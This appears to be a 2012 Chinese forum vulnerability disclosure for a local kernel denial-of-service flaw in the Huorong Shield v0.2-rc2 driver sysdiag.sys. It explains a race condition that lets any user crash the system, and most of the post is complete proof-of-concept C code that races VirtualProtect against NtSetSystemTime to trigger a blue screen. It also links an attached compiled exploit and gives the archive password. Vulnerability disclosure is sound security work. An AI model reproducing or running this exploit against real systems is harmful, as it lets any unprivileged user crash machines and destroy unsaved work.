本帖最后由 LockeHIPS 于 2012-3-30 14:31 编辑
火绒盾v0.2-rc2 sysdiag.sys <=0.0.0.1 本地内核拒绝服务漏洞
存在漏洞的软件:火绒盾v0.2-rc2及以下版本
存在漏洞的组件:sysdiag.sys <=0.0.0.1
漏洞原理:火绒盾安全软件的核心驱动程序sysdiag.sys没有正确处理参数,使用了不恰当的处理方式,在竞争条件下可能访问异常的内存,导致在任意用户权限下可引发系统蓝屏崩溃
同样类似的漏洞在火绒盾的核心驱动中大概还存在十几处。
验证代码:
- #include "stdafx.h"
- #include "windows.h"
- DWORD __stdcall thread1(PVOID pMem)
- {
- SetThreadPriority(GetCurrentThread() , THREAD_PRIORITY_HIGHEST);
- while(TRUE)
- {
- DWORD oldp ;
- VirtualProtect(pMem , 0x1000 , PAGE_NOACCESS , &oldp );
- }
- }
- int main(int argc, char* argv[])
- {
- DWORD oldp;
- PVOID pNtSetSystemTime = GetProcAddress(GetModuleHandle("ntdll.dll") , "NtSetSystemTime");
- PVOID pMem = VirtualAlloc(NULL , 0x1000 , MEM_RESERVE|MEM_COMMIT , PAGE_READWRITE);
- DWORD tid ;
- CreateThread(NULL , 0 , thread1 , pMem , 0 , &tid);
- while(TRUE)
- {
- VirtualProtect(pMem, 0x1000 , PAGE_READWRITE , &oldp);
- __asm
- {
- push 0
- push pMem
- call pNtSetSystemTime
- }
- }
- return 0;
- }
复制代码 验证程序见附件,解压密码是huorongdun,在安装了火绒盾的系统上,以任意用户权限运行一段时间系统就会蓝屏
虚拟机或单核系统会慢一些,双核系统会快一些,但应该都不超过10分钟就会蓝屏
dossysdig_1.rar
(10.25 KB, 下载次数: 321)
|